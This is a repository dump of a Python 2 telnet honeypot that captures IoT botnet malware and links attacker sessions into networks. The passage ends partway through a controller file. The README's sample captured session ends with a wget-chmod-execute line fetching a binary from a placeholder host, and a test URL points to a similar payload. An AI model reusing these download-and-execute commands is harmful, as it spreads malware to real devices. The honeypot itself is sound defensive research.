[
  {
    "path": ".gitignore",
    "content": "*.pyc\n*.db\nsamples/\nMirai-Source-Code-master/\nobf.py\nimport-lost-conns.py\nimport-length.py\nreview-sampels.py\n*.kate-swp\n*.sql\n*.log\nconfig.yaml\n"
  },
  {
    "path": "Dockerfile",
    "content": "FROM python:2\n\nWORKDIR /usr/src/app\n\nCOPY ./requirements.txt ./\nRUN pip install --no-cache-dir -r requirements.txt\nRUN pip install mysqlclient\n\nCOPY . .\n\nRUN apt update && apt install -y sqlite3\n"
  },
  {
    "path": "INSTALL.md",
    "content": "# Installation\n\nFor installation instructions, go to section Manual installation.\nHowever, if you just want to get everythig running, there is\nalso a Vagrantfile. See Section Vagrent for that.\n\n# Vagrant\n\nThere is a Vagrantfile in the folder vagrant/ you can use to just make\na basic deployment with honeypot + backend + sqlite running.\n\nInstall vagrant and vagrant virtualbox porvider,\nthen go to vagrant folder and type `vagrant up`.\nAfter a while the box should run a honeypot + backend available\nvia port-forwarding at `http://localhost:5000/` and `telnet://localhost:2223`.\n\n# Manual installation\nconfirmed to work with Ubuntu 16.04.2 LTS\n\nInstall all requirements:\n\n```\napt-get install -y python-pip libmysqlclient-dev python-mysqldb git sqlite3\n\ngit clone https://github.com/Phype/telnet-iot-honeypot.git\ncd telnet-iot-honeypot\npip install -r requirements.txt\n```\n\n\tsudo apt-get install python-setuptools python-werkzeug \\\n\t\tpython-flask python-flask-httpauth python-sqlalchemy \\\n\t\tpython-requests python-decorator python-dnspython \\\n\t\tpython-ipaddress python-simpleeval python-yaml\n\nIf you want to use mysql, create a mysql database. Default mysql max key length is 767 bytes,\nso it is recommended to use latin1 charset, else the db setup will fail.\n\n```\napt-get install mysql-server mysql-client\nsudo mysql_secure_installation\n\nmysql\nCREATE DATABASE telhoney CHARACTER SET latin1 COLLATE latin1_swedish_ci;\ngrant all privileges on telhoney.* to telhoney@localhost identified by \"YOUR_PASSWORD\";\nflush privileges;\n```\n\n## Configuration\n\nThis software consists of 2 components, a honeypot (client) and a backend (server).\nThe honeypot will accept incoming telnet connections and may download samples\nwhich an adversary may try to download in the telnet session. When a session is\nclosed, the honeypot will post all data about the connection to the backend using\na REST-API.\n\nThe configuration for both honeypot and backend is in the files\n`config.dist.yaml` and `config.yaml`. The `config.dist.yaml` contains the default\nconfig. If you want to change anything, change or create overriding entries in\n`config.yaml`. If you need documentation about the configuration,\nthe file `config.dist.yaml` contains some comments.\n\nThe REST-API requires authentification (HTTP Basic Auth).\nWhen the backend is started for the first time,\nit will create a \"users\" table in the database containing an \"admin\" user.\nThe admin users password is read from the configuration file.\nIf this file is empty, it will be created with random credentials.\n\n*TL;DR*: The default config should just work, if you need the credentials for the\nadmin user, see the file `config.yaml`.\n\n## Running\n\nCreate a config:\n\n\tbash create_config.sh\n\nStart the backend:\n\n\tpython backend.py\n\nNow, start the honeypot:\n\n\tpython honeypot.py\n\nNow, you can test the honeypot\n\n    telnet 127.0.0.1 2223\n\n## HTML Frontend\n\nYou can use the frontend by just opening the file html/index.html in your browser.\nIf you want to make the frontend publically available, deploy the html/ folder to you webserver,\nor install one:\n\n```\nsudo apt-get install apache2\ncd telnet-iot-honeypot\ncp -R html /var/www\nsudo chown www-data:www-data /var/www -R\n```\n\n## Virustotal integration\n\nPlease get yout own virustotal key,\nsince mine only allows for 4 API Req/min.\n\nFor how to do this, see https://www.virustotal.com/de/faq/#virustotal-api\n\nWhen you got one, put it in your config.yamland enable virustotal integration:\n\n\tvt_key: \"GET_YOUR_OWN\"\n    submit_to_vt: true\n\nIf you want to import virustotal reports of the collected samples,\nrun (may have to restart because of db locks). *TODO*: test if this still works\n\n\tpython virustotal_fill_db.php\n\n"
  },
  {
    "path": "README.md",
    "content": "## Disclaimer\n\nThis project neither supported or in development anymore. It is based on python2 which has reached its EOL in 2020 and uses dependencies which are getting harder to install over time. Use at your own risk! \n\n# Telnet IoT honeypot\n\n'Python telnet honeypot for catching botnet binaries'\n\nThis project implements a python telnet server trying to act\nas a honeypot for IoT Malware which spreads over horribly\ninsecure default passwords on telnet servers on the internet.\n\nThe honeypot works by emulating a shell enviroment, just like \ncowrie (https://github.com/micheloosterhof/cowrie).\nThe aim of this project is primarily to automatically analyse\nBotnet connections and \"map\" Botnets by linking diffrent\nconnections and even Networks together.\n\n## Architecture\n\nThe application has a client/server architecture,\nwith a client (the actual honeypot) accepting telnet connections\nand a server which receives information about connections and\ndoes the analysis.\n\nThe backend server exposes a HTTP interface which is used\nto access to frontend as well as by the clients to push new\nConnection information to the backend.\n\n## Automatic analysis\n\nThe Backend uses 2 diffrent mechanisms to automatically link\nconnections:\n\n### Networks\n\nNetworks are discovered Botnets. A network is the set of all linked\nconnections, urls and samples. Urls and samples\nare linked when they are used in a connection. Two connections are linked\nwhen both connections are recieved by the same honeypot client\n(mutliple clients are supported!) and use the same credentials in a short\nperiod of time (defautl 2 minutes) or come from the same IP address.\n\n### Malware\n\nMultiple networks are identified to use the same type of malware\nif the text entered during sessions of the networks aro mostly the\nsame. This comparison is done using sort of \"hash\"-function which\nbasically translates a session (or connection) into a sequence\nof words and then maps each word to a single byte so this resulting\nsequence of bytes can be easily searched.\n\n# Running\n\nThe application has a config file named config.py.\nSamples are included for local and client/server deployments.\n\n## Configuration\n\nThe backend requires a SQL-database (default sqlite) which is initialized\nat first run. Before the first run you should generate a admin account\nwhich is used to generate more users. The admin account can also directly\nused by a client to post connections. When more than one honeypots shall be\nconnected, creating multiple users is recommended.\n\n\tbash create_config.sh\n\nBoth client and backend will read the files `config.yaml` and `config.dist.yaml`\nto read configuration parameters. The `config.dist.yaml` file includes\ndefault values for all but admin user credentials and these parameters\nare overwirtten by entries in the `config.yaml` file.\n\n## Running the Server\n\n\tpython backend.py\n\n## Running the Client\n\nThis project contains an own honeypot, however because of the client-server architecture,\nother honeypot can be used as well.\n\n### Using the built-in honeypot\n\n\tpython honeypot.py\n\nThe client cannot be started without the server running. To use a diffrent configuration\nfor the client you can use the `-c` switch like this:\n\n\tpython honeypot.py -c myconfig.yaml\n\nIf you only want to check the honeypot functionality,\nyou can start the client in interactive mode:\n\n\tpython honeypot shell\n\n### Using cowrie\n\nI wrote an output plugin for cowrie, which has much more features than the built in honeypot.\nIf you want to use cowrie instead, checkout my fork which includes the output module here:\nhttps://github.com/Phype/cowrie .\n\n## Opening the frontend\n\nAfter the server is started, open `http://127.0.0.1/` in your favorite browser.\n\n## Sample Connection\n\n\tenable\n\tshell\n\tsh\n\tcat /proc/mounts; /bin/busybox PEGOK\n\tcd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK\n\tnc; wget; /bin/busybox PEGOK\n\t(dd bs=52 count=1 if=.s || cat .s)\n\t/bin/busybox PEGOK\n\trm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit\n\n## Images\n\n![Screenshot 1](images/screen1.png)\n\n![Screenshot 2](images/screen2.png)\n\n![Screenshot 3](images/screen3.png)\n"
  },
  {
    "path": "backend/__init__.py",
    "content": ""
  },
  {
    "path": "backend/additionalinfo.py",
    "content": "import dns.resolver\nimport ipaddress\nimport urlparse\nimport re\nimport traceback\n\nimport ipdb.ipdb\n\ndef filter_ascii(string):\n\t\tstring = ''.join(char for char in string if ord(char) < 128 and ord(char) > 32 or char in \"\\r\\n \")\n\t\treturn string\n\ndef query_txt(cname):\n\ttry:\n\t\tanswer = dns.resolver.query(filter_ascii(cname), \"TXT\")\n\n\t\tfor rr in answer.rrset:\n\t\t\tif rr.strings: return rr.strings[0]\n\texcept Exception as e:\n\t\ttraceback.print_exc()\n\t\tpass\n\n\treturn None\n\ndef query_a(cname):\n\ttry:\n\t\tanswer = dns.resolver.query(filter_ascii(cname), \"A\")\n\n\t\tfor data in answer:\n\t\t\tif data.address: return data.address\n\texcept:\n\t\ttraceback.print_exc()\n\t\tpass\n\n\treturn None\n\ndef txt_to_ipinfo(txt):\n\tparts = txt.split(\"|\")\n\n\treturn {\n\t\t\"asn\":     filter_ascii(parts[0].strip()),\n\t\t\"ipblock\": filter_ascii(parts[1].strip()),\n\t\t\"country\": filter_ascii(parts[2].strip()),\n\t\t\"reg\":     filter_ascii(parts[3].strip()),\n\t\t\"updated\": filter_ascii(parts[4].strip())\n\t}\n\ndef txt_to_asinfo(txt):\n\tparts = txt.split(\"|\")\n\t\n\treturn {\n\t\t\"asn\":     filter_ascii(parts[0].strip()),\n\t\t\"country\": filter_ascii(parts[1].strip()),\n\t\t\"reg\":     filter_ascii(parts[2].strip()),\n\t\t\"updated\": filter_ascii(parts[3].strip()),\n\t\t\"name\":    filter_ascii(parts[4].strip())\n\t}\n\ndef get_ip4_info(ip):\n\toktets  = ip.split(\".\")\n\treverse = oktets[3] + \".\" + oktets[2] + \".\" + oktets[1] + \".\" + oktets[0]\n\t\n\tanswer = query_txt(reverse + \".origin.asn.cymru.com\")\n\n\tif answer:\n\t\treturn txt_to_ipinfo(answer)\n\t\n\treturn None\n\ndef get_ip6_info(ip):\n\tip = ipaddress.ip_address(unicode(ip))\n\tip = list(ip.exploded.replace(\":\", \"\"))\n\t\n\tip.reverse()\n\t\n\treverse = \".\".join(ip)\n\t\n\tanswer = query_txt(reverse + \".origin6.asn.cymru.com\")\n\tif answer:\n\t\treturn txt_to_ipinfo(answer)\n\t\n\treturn None\n\ndef get_ip_info(ip):\n\tis_v4 = \".\" in ip\n\tis_v6 = \":\" in ip\n\t\n\tif is_v4:\n\t\treturn get_ip4_info(ip)\n\telif is_v6:\n\t\treturn get_ip6_info(ip)\n\telse:\n\t\tprint(\"Cannot parse ip \" + ip)\n\t\treturn None\n\ndef get_asn_info(asn):\n\tanswer = query_txt(\"AS\" + str(asn) + \".asn.cymru.com\")\n\tif answer:\n\t\treturn txt_to_asinfo(answer)\n\t\n\treturn None\n\ndef get_url_info(url):\n\ttry:\n\t\tparsed = urlparse.urlparse(url)\n\t\tnetloc = parsed.netloc\n\t\tip     = None\n\t\t\n\t\t# IPv6\n\t\tif \"[\" in netloc:\n\t\t\tnetloc = re.match(\"\\\\[(.*)\\\\]\", netloc).group(1)\n\t\t\tip = netloc\n\t\t\t\n\t\t# IPv4 / domain name\n\t\telse:\n\t\t\tif \":\" in netloc:\n\t\t\t\tnetloc = re.match(\"(.*?):\", netloc).group(1)\n\t\t\t\n\t\t\tif re.match(\"[a-zA-Z]\", netloc):\n\t\t\t\tip = query_a(netloc)\n\t\t\telse:\n\t\t\t\tip = netloc\n\t\t\n\t\treturn ip, get_ip_info(ip)\n\t\n\texcept:\n\t\ttraceback.print_exc()\n\t\tpass\n\t\n\treturn None\n\nif __name__ == \"__main__\":\n\tprint get_ip_info(\"79.220.249.125\")\n\tprint get_ip_info(\"2a00:1450:4001:81a::200e\")\n\tprint get_asn_info(3320)\n\n\tprint get_url_info(\"http://google.com\")\n\tprint get_url_info(\"http://183.144.16.51:14722/.i\")\n\tprint get_url_info(\"http://[::1]:14722/.i\")\n"
  },
  {
    "path": "backend/authcontroller.py",
    "content": "import os\nimport hashlib\nimport traceback\nimport struct\nimport json\nimport time\n\nimport additionalinfo\nimport ipdb.ipdb\n\nfrom sqlalchemy import desc, func, and_, or_\nfrom decorator import decorator\nfrom functools import wraps\nfrom simpleeval import simple_eval\nfrom argon2 import argon2_hash\n\nfrom db import get_db, filter_ascii, Sample, Connection, Url, ASN, Tag, User, Network, Malware, IPRange, db_wrapper\nfrom virustotal import Virustotal\n\nfrom cuckoo import Cuckoo\n\nfrom util.dbg import dbg\nfrom util.config import config\n\nfrom difflib import ndiff\n\nclass AuthController:\n\n\tdef __init__(self):\n\t\tself.session = None\n\t\tself.salt    = config.get(\"backend_salt\")\n\t\tself.checkInitializeDB()\n\n\tdef pwhash(self, username, password):\n\t\treturn argon2_hash(str(password), self.salt + str(username), buflen=32).encode(\"hex\")\n\n\t@db_wrapper\n\tdef checkInitializeDB(self):\n\t\tuser = self.session.query(User).filter(User.id == 1).first()\n\t\tif user == None:\n\t\t\tadmin_name = config.get(\"backend_user\")\n\t\t\tadmin_pass = config.get(\"backend_pass\")\n\n\t\t\tprint 'Creating admin user \"' + admin_name + '\" see config for password'\n\t\t\tself.addUser(admin_name, admin_pass, 1)\n\n\t@db_wrapper\n\tdef getUser(self, username):\n\t\tuser = self.session.query(User).filter(User.username == username).first()\n\t\treturn user.json(depth=1) if user else None\n\n\t@db_wrapper\n\tdef addUser(self, username, password, id=None):\n\t\tuser = User(username=username, password=self.pwhash(username, password))\n\t\tif id != None:\n\t\t\tuser.id = id\n\t\tself.session.add(user)\n\t\treturn user.json()\n\n\t@db_wrapper\n\tdef checkAdmin(self, user):\n\t\tuser = self.session.query(User).filter(User.username == user).first()\n\t\tif user == None:\n\t\t\treturn False\n\t\treturn user.id == 1\n\n\t@db_wrapper\n\tdef checkLogin(self, username, password):\n\t\tuser = self.session.query(User).filter(User.username == username).first()\n\t\tif user == None:\n\t\t\treturn False\n\t\tif self.pwhash(username, password) == user.password:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n"
  },
  {
    "path": "backend/backend.py",
    "content": "from flask import Flask, request, Response, redirect, send_from_directory\nfrom flask_httpauth import HTTPBasicAuth\nfrom flask_socketio import SocketIO\n\nauth = HTTPBasicAuth()\n\nfrom db import get_db\n\nfrom clientcontroller import ClientController\nfrom webcontroller import WebController\nfrom authcontroller import AuthController\n\nfrom util.config import config\n\nimport os\nimport json\nimport base64\nimport time\nimport signal\n\napp  = Flask(__name__)\n\nctrl     = ClientController()\nweb      = WebController()\nauthctrl = AuthController()\nsocketio = SocketIO(app)\n\napp.debug = True\n\ndef red(obj, attributes):\n\tif not obj:\n\t\treturn None\n\tres = {}\n\tfor a in attributes:\n\t\tif a in obj:\n\t\t\tres[a] = obj[a]\n\treturn res\n\n###\n#\n# Globals\n#\n###\n\n\nSECS_PER_MONTH = 3600 * 24 * 31\n\n@app.after_request\ndef add_cors(response):\n    response.headers[\"Access-Control-Allow-Origin\"]  = \"*\"\n    response.headers[\"Access-Control-Allow-Methods\"] = \"GET, POST, PUT, DELETE\"\n    response.headers[\"Access-Control-Allow-Headers\"] = \"Authorization, Content-type\"\n    return response\n\n@auth.verify_password\ndef verify_password(username, password):\n\treturn authctrl.checkLogin(username, password)\n\n###\n#\n# Index\n#\n###\n\n@app.route('/')\ndef send_index():\n\treturn redirect('/html/index.html')\n\n@app.route('/html/<path:filename>')\ndef serve_static(filename):\n\troot_dir = os.getcwd()\n\treturn send_from_directory(os.path.join(root_dir, 'html'), filename)\n\n###\n#\n# Admin API\n#\n###\n\n@app.route(\"/user/<username>\", methods = [\"PUT\"])\n@auth.login_required\ndef add_user(username):\n\tif authctrl.checkAdmin(auth.username()):\n\t\tuser = request.json\n\t\tif user[\"username\"] != username:\n\t\t\treturn \"username mismatch in url/data\", 500\n\t\treturn json.dumps(authctrl.addUser(user[\"username\"], user[\"password\"]))\n\telse:\n\t\treturn \"Authorization required\", 401\n\n###\n#\n# Upload API\n#\n###\n\n@app.route(\"/login\")\n@auth.login_required\ndef test_login():\n\treturn \"LOGIN OK\"\n\n@app.route(\"/conns\", methods = [\"PUT\"])\n@auth.login_required\ndef put_conn():\n\tsession = request.json\n\tsession[\"backend_username\"] = auth.username()\n\n\tprint(\"--- PUT SESSION ---\")\n\tprint(json.dumps(session))\n\n\tsession = ctrl.put_session(session)\n\tsocketio.emit('session', session)\n\n\treturn json.dumps(session)\n\n@app.route(\"/sample/<sha256>\", methods = [\"PUT\"])\n@auth.login_required\ndef put_sample_info(sha256):\n\tsample = request.json\n\n\treturn json.dumps(ctrl.put_sample_info(sample))\n\n@app.route(\"/sample/<sha256>/update\", methods = [\"GET\"])\n@auth.login_required\ndef update_sample(sha256):\n\treturn json.dumps(ctrl.update_vt_result(sha256))\n\n@app.route(\"/file\", methods = [\"POST\"])\n@auth.login_required\ndef put_sample():\n\tdata   = request.get_data()\n\t\n\treturn json.dumps(ctrl.put_sample(data))\n\n###\n#\n# Public API\n#\n###\n\ndef fail(msg = \"\", code = 400):\n\tobj = {\"ok\" : False, \"msg\" : msg}\n\treturn Response(json.dumps(obj), status=code, mimetype='application/json')\n\n### Networks\n\n@app.route(\"/housekeeping\", methods = [\"GET\"])\ndef housekeeping():\n\tctrl.do_housekeeping()\n\treturn \"DONE\"\n\n@app.route(\"/networks\", methods = [\"GET\"])\ndef get_networks():\n\treturn json.dumps(web.get_networks())\n\n@app.route(\"/network/<net_id>\", methods = [\"GET\"])\ndef get_network(net_id):\n\treturn json.dumps(web.get_network(net_id))\n\n@app.route(\"/network/<net_id>/locations\", methods = [\"GET\"])\ndef get_network_locations(net_id):\n\tnow = int(time.time())\n\tloc = web.get_connection_locations(now - SECS_PER_MONTH, now, int(net_id))\n\treturn json.dumps(loc)\n\n@app.route(\"/network/<net_id>/history\", methods = [\"GET\"])\ndef get_network_history(net_id):\n\t\n\tnot_before = request.args.get(\"not_before\")\n\tnot_after  = request.args.get(\"not_after\")\n\t\n\tif not_before == None or not_after == None:\n\t\tnot_after  = int(time.time())\n\t\tnot_before = not_after - SECS_PER_MONTH\n\telse:\n\t\tnot_before = int(not_before)\n\t\tnot_after  = int(not_after)\n\t\t\n\td = web.get_network_history(not_before, not_after, int(net_id))\n\treturn json.dumps(d)\n\n@app.route(\"/network/biggest_history\", methods = [\"GET\"])\ndef get_network_biggest_history():\n\t\n\tnot_before = request.args.get(\"not_before\")\n\tnot_after  = request.args.get(\"not_after\")\n\t\n\tif not_before == None or not_after == None:\n\t\tnot_after  = int(time.time())\n\t\tnot_before = not_after - SECS_PER_MONTH\n\telse:\n\t\tnot_before = int(not_before)\n\t\tnot_after  = int(not_after)\n\t\t\n\td = web.get_biggest_networks_history(not_before, not_after)\n\treturn json.dumps(d)\n\n\n### Malwares\n\n@app.route(\"/malwares\", methods = [\"GET\"])\ndef get_malwares():\n\treturn json.dumps(web.get_malwares())\n\n### Samples\n\n@app.route(\"/sample/<sha256>\")\ndef get_sample(sha256):\n\tsample = web.get_sample(sha256)\n\tif sample:\n\t\treturn json.dumps(sample)\n\telse:\n\t\treturn \"\", 404\n\t\n@app.route(\"/sample/newest\")\ndef get_newest_samples():\n\tsamples = web.get_newest_samples()\n\treturn json.dumps(samples)\n\t\t\n### Urls\n\n@app.route(\"/url/<ref_enc>\", methods = [\"GET\"])\ndef get_url(ref_enc):\n\tref = base64.b64decode(ref_enc)\n\tprint(\"\\\"\" + ref_enc + \"\\\" decodes to \\\"\" + ref + \"\\\"\")\n\t\n\turl = web.get_url(ref)\n\tif url:\n\t\treturn json.dumps(url)\n\telse:\n\t\treturn \"\", 404\n\t\n@app.route(\"/url/newest\")\ndef get_newest_urls():\n\turls = web.get_newest_urls()\n\treturn json.dumps(urls)\n\t\t\n### connections\n\n@app.route(\"/connection/<id>\")\ndef get_connection(id):\n\tconn = web.get_connection(id)\n\tif conn:\n\t\treturn json.dumps(conn)\n\telse:\n\t\treturn \"\", 404\n\t\n@app.route(\"/connections\")\ndef get_connections():\n\tobj          = {}\n\tallowed_keys = [\"ipblock\", \"user\", \"password\", \"ip\", \"country\", \"asn_id\", \"network_id\"]\n\t\n\tfor k,v in request.args.iteritems():\n\t\tif k in allowed_keys:\n\t\t\tobj[k] = v\n\t\n\tconn = web.get_connections(obj, request.args.get(\"older_than\", None))\n\tif conn:\n\t\treturn json.dumps(conn)\n\telse:\n\t\treturn \"\", 404\n\n@app.route(\"/connections_fast\")\ndef get_connections_fast():\n\tconn = web.get_connections_fast()\n\tif conn:\n\t\treturn json.dumps(conn)\n\telse:\n\t\treturn \"\", 404\n\t\n@app.route(\"/connection/statistics/per_country\")\ndef get_country_stats():\n\tstats = web.get_country_stats()\n\treturn json.dumps(stats)\n\n@app.route(\"/connection/by_country/<country>\")\ndef get_country_connections(country):\n\tolder_than = request.args.get('older_than', None)\n\tstats = web.get_country_connections(country, older_than)\n\treturn json.dumps(stats)\n\n@app.route(\"/connection/by_ip/<ip>\")\ndef get_ip_connections(ip):\n\tolder_than = request.args.get('older_than', None)\n\tstats = web.get_ip_connections(ip, older_than)\n\treturn json.dumps(stats)\n\t\n@app.route(\"/connection/newest\")\ndef get_newest_connections():\n\tconnections = web.get_newest_connections()\n\treturn json.dumps(connections)\n\n@app.route(\"/connection/locations\")\ndef get_connection_locations():\n\tnow   = int(time.time())\n\tloc   = web.get_connection_locations(now - SECS_PER_MONTH, now)\n\treturn json.dumps(loc)\n\n### Tags\n\n@app.route(\"/tag/<name>\")\ndef get_tag(name):\n\ttag = web.get_tag(name)\n\tif tag:\n\t\treturn json.dumps(tag)\n\telse:\n\t\treturn \"\", 404\n\n@app.route(\"/tags\")\ndef get_tags():\n\ttags = web.get_tags()\n\treturn json.dumps(tags)\n\n### Hist\n\n@app.route(\"/connhashtree/<layers>\")\ndef connhash_tree(layers):\n\treturn json.dumps(web.connhash_tree(int(layers)))\n\t\t\n### ASN\n\n@app.route(\"/asn/<asn>\")\ndef get_asn(asn):\n\tinfo = web.get_asn(asn)\n\tif not info:\n\t\treturn \"\", 404\n\t\n\treturn json.dumps(info)\n\ndef run():\n\tsignal.signal(15, stop)\n\n\tapp.run(host=config.get(\"http_addr\"), port=config.get(\"http_port\"),threaded=True)\n\t#socketio.run(app, host=config.get(\"http_addr\"), port=config.get(\"http_port\"))\n\ndef stop():\n\tprint \"asdasdasd\"\n\nif __name__ == \"__main__\":\n\trun()\n"
  },
  {
    "path": "backend/clientcontroller.py",
    "content": "import os\nimport hashlib\nimport traceback\nimport struct\nimport json\nimport time\nimport socket\nimport urlparse\nimport random\n\nimport additionalinfo\nimport ipdb.ipdb\n\nfrom sqlalchemy import desc, func, and_, or_\nfrom decorator import decorator\nfrom functools import wraps\nfrom simpleeval import simple_eval\nfrom argon2 import argon2_hash\n\nfrom db import get_db, filter_ascii, Sample, Connection, Url, ASN, Tag, User, Network, Malware, IPRange, db_wrapper\nfrom virustotal import Virustotal\n\nfrom cuckoo import Cuckoo\n\nfrom util.dbg import dbg\nfrom util.config import config\n\nfrom difflib import ndiff\n\nANIMAL_NAMES = [\"Boar\",\"Stallion\",\"Yak\",\"Beaver\",\"Salamander\",\"Eagle Owl\",\"Impala\",\"Elephant\",\"Chameleon\",\"Argali\",\"Lemur\",\"Addax\",\"Colt\",\n\t\t\t\t\"Whale\",\"Dormouse\",\"Budgerigar\",\"Dugong\",\"Squirrel\",\"Okapi\",\"Burro\",\"Fish\",\"Crocodile\",\"Finch\",\"Bison\",\"Gazelle\",\"Basilisk\",\n\t\t\t\t\"Puma\",\"Rooster\",\"Moose\",\"Musk Deer\",\"Thorny Devil\",\"Gopher\",\"Gnu\",\"Panther\",\"Porpoise\",\"Lamb\",\"Parakeet\",\"Marmoset\",\"Coati\",\n\t\t\t\t\"Alligator\",\"Elk\",\"Antelope\",\"Kitten\",\"Capybara\",\"Mule\",\"Mouse\",\"Civet\",\"Zebu\",\"Horse\",\"Bald Eagle\",\"Raccoon\",\"Pronghorn\",\n\t\t\t\t\"Parrot\",\"Llama\",\"Tapir\",\"Duckbill Platypus\",\"Cow\",\"Ewe\",\"Bighorn\",\"Hedgehog\",\"Crow\",\"Mustang\",\"Panda\",\"Otter\",\"Mare\",\n\t\t\t\t\"Goat\",\"Dingo\",\"Hog\",\"Mongoose\",\"Guanaco\",\"Walrus\",\"Springbok\",\"Dog\",\"Kangaroo\",\"Badger\",\"Fawn\",\"Octopus\",\"Buffalo\",\"Doe\",\n\t\t\t\t\"Camel\",\"Shrew\",\"Lovebird\",\"Gemsbok\",\"Mink\",\"Lynx\",\"Wolverine\",\"Fox\",\"Gorilla\",\"Silver Fox\",\"Wolf\",\"Ground Hog\",\"Meerkat\",\n\t\t\t\t\"Pony\",\"Highland Cow\",\"Mynah Bird\",\"Giraffe\",\"Cougar\",\"Eland\",\"Ferret\",\"Rhinoceros\"]\n\n# Controls Actions perfomed by Honeypot Clients\nclass ClientController:\n\n\tdef __init__(self):\n\t\tself.session  = None\n\t\tif config.get(\"submit_to_vt\"):\n\t\t\tself.vt = Virustotal(config.get(\"vt_key\", optional=True))\n\t\telse:\n\t\t\tself.vt = None\n\t\tself.cuckoo   = Cuckoo(config)\n\t\t\n\t\tself.do_ip_to_asn_resolution = False\n\t\tself.ip2asn = config.get(\"ip_to_asn_resolution\", optional=True, default=True)\n\t\tif self.ip2asn == \"offline\":\n\t\t\tself.do_ip_to_asn_resolution = True\n\t\t\tself.fill_db_ipranges()\n\t\tif self.ip2asn == \"online\":\n\t\t\tself.do_ip_to_asn_resolution = True\n\n\t@db_wrapper\n\tdef _get_asn(self, asn_id):\n\t\tasn_obj = self.session.query(ASN).filter(ASN.asn == asn_id).first()\n\t\t\n\t\tif asn_obj:\n\t\t\treturn asn_obj\n\t\telse:\n\t\t\tasn_info = additionalinfo.get_asn_info(asn_id)\n\t\t\tif asn_info:\n\t\t\t\tasn_obj = ASN(asn=asn_id, name=asn_info['name'], reg=asn_info['reg'], country=asn_info['country'])\n\t\t\t\tself.session.add(asn_obj)\n\t\t\t\treturn asn_obj\n\t\t\t\n\t\treturn None\n\n\tdef calc_connhash_similiarity(self, h1, h2):\n\t\tl = min(len(h1), len(h2))\n\t\tr = 0\n\t\tfor i in range(0, l):\n\t\t\tr += int(h1[i] != h2[i])\n\n\t\tif l == 0: return 0\n\t\treturn float(r)/float(l)\n\n\tdef calc_connhash(self, stream):\n\t\toutput = \"\"\n\t\tfor event in stream:\n\t\t\tif event[\"in\"]:\n\t\t\t\tline  = event[\"data\"]\n\t\t\t\tline  = line.strip()\n\t\t\t\tparts = line.split(\" \")\n\t\t\t\tfor part in parts:\n\t\t\t\t\tpart_hash = chr(hash(part) % 0xFF)\n\t\t\t\t\toutput += part_hash\n\n\t\t# Max db len is 256, half because of hex encoding\n\t\treturn output[:120]\n\n\t@db_wrapper\n\tdef fill_db_ipranges(self):\t\t\n\t\tif self.session.query(IPRange.ip_min).count() != 0:\n\t\t\treturn\n\t\t\n\t\tprint \"Filling IPRange Tables\"\n\t\t\n\t\tasntable = ipdb.ipdb.get_asn()\n\t\tprogress = 0\n\t\t\n\t\tfor row in ipdb.ipdb.get_geo_iter():\n\t\t\tprogress += 1\n\t\t\tif progress % 1000 == 0:\n\t\t\t\tself.session.commit()\n\t\t\t\tself.session.flush()\n\t\t\t\tprint str(100.0 * float(row[0]) / 4294967296.0) + \"% / \" + str(100.0 * progress / 3315466) + \"%\" \n\t\t\t\n\t\t\tip = IPRange(ip_min = int(row[0]), ip_max=int(row[1]))\n\t\t\t\n\t\t\tip.country   = row[2]\n\t\t\tip.region    = row[4]\n\t\t\tip.city      = row[5]\n\t\t\tip.zipcode   = row[8]\n\t\t\tip.timezone  = row[9]\n\t\t\tip.latitude  = float(row[6])\n\t\t\tip.longitude = float(row[7])\n\t\t\t\n\t\t\tasn_data = asntable.find_int(ip.ip_min)\n\t\t\t\n\t\t\tif asn_data:\n\t\t\t\tasn_id = int(asn_data[3])\n\t\t\t\tasn_db = self.session.query(ASN).filter(ASN.asn == asn_id).first()\n\t\t\t\t\n\t\t\t\tif asn_db == None:\n\t\t\t\t\tasn_db = ASN(asn = asn_id, name = asn_data[4], country=ip.country)\n\t\t\t\t\tself.session.add(asn_db)\n\t\t\t\t\n\t\t\t\tip.asn = asn_db\n\t\t\t\t\n\t\t\t\t# Dont add session if we cannot find an asn for it\n\t\t\t\tself.session.add(ip)\n\t\t\n\t\tprint \"IPranges loaded\"\n\t\t\n\t@db_wrapper\n\tdef get_ip_range_offline(self, ip):\n\t\tip_int = ipdb.ipdb.ipstr2int(ip)\n\t\t\n\t\trange = self.session.query(IPRange).filter(and_(IPRange.ip_min <= ip_int, \n\t\t\tip_int <= IPRange.ip_max)).first()\n\t\t\n\t\treturn range\n\n\tdef get_ip_range_online(self, ip):\n\t\t\n\t\taddinfo = additionalinfo.get_ip_info(ip)\n\t\t\n\t\tif addinfo:\n\t\t\n\t\t\t# TODO: Ugly hack\n\t\t\trange = type('',(object,),{})()\n\t\t\t\n\t\t\trange.country   = addinfo[\"country\"]\n\t\t\trange.city      = \"Unknown\"\n\t\t\trange.latitude  = 0\n\t\t\trange.longitude = 0\n\t\t\trange.asn_id    = int(addinfo[\"asn\"])\n\t\t\trange.asn       = self._get_asn(range.asn_id)\n\t\t\trange.cidr      = addinfo[\"ipblock\"]\n\t\t\t\n\t\t\treturn range\n\t\t\n\t\telse:\n\t\t\t\n\t\t\treturn None\n\n\tdef get_ip_range(self, ip):\n\t\tif self.ip2asn == \"online\":\n\t\t\treturn self.get_ip_range_online(ip)\n\t\telse:\n\t\t\treturn self.get_ip_range_offline(ip)\n\t\t\n\tdef get_url_info(self, url):\n\t\tparsed = urlparse.urlparse(url)\n\t\thost   = parsed.netloc.split(':')[0]\n\t\t\n\t\tif host[0].isdigit():\n\t\t\tip = host\n\t\telse:\n\t\t\ttry:\n\t\t\t\tip = socket.gethostbyname(host)\n\t\t\texcept:\n\t\t\t\treturn None\n\t\t\t\n\t\trange  = self.get_ip_range(ip)\n\t\treturn ip, range\n\t\n\t@db_wrapper\n\tdef do_housekeeping(self):\n\t\t\n\t\tfor malware in self.session.query(Malware).all():\n\t\t\tmalware.name = random.choice(ANIMAL_NAMES)\n\t\t\n\t\t# rebuild nb_firstconns\n\t\tif False:\n\t\t\t\n\t\t\tnet_cache = {}\n\t\t\t\n\t\t\tfor conn in self.session.query(Connection).all():\n\t\t\t\tif len(conn.conns_before) == 0:\n\t\t\t\t\tif conn.network_id in net_cache:\n\t\t\t\t\t\tnet_cache[conn.network_id] += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tnet_cache[conn.network_id] = 1\n\t\t\t\n\t\t\tfor network in self.session.query(Network).all():\n\t\t\t\tif network.id in net_cache:\n\t\t\t\t\tnetwork.nb_firstconns = 